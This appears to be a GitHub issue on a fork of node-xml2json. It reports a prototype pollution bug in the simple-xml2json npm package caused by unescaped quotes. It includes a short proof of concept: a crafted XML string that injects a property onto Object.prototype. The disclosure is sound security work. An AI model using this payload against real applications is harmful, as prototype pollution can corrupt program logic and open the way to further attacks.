forked from Kenshin/node-xml2json
Open
Description
Hello, I found a vulnerability in your package. The thing is that there is no encoding of `"`, so it is possible to rewrite the prototype of the object.
Steps to reproduce:
- Install your package from npm
- write into a code file something like:
var xml2json = require("simple-xml2json");
// Tag name carries a __proto__ path; the unescaped quote lets it through as a key
var xml = '<".__proto__.__proto__.slonser="PWNED"+"></__proto__>';
var json = xml2json.parser(xml);
// A fresh, unrelated object now inherits the injected property
var a = {};
console.log(a.slonser);
- Result: pwned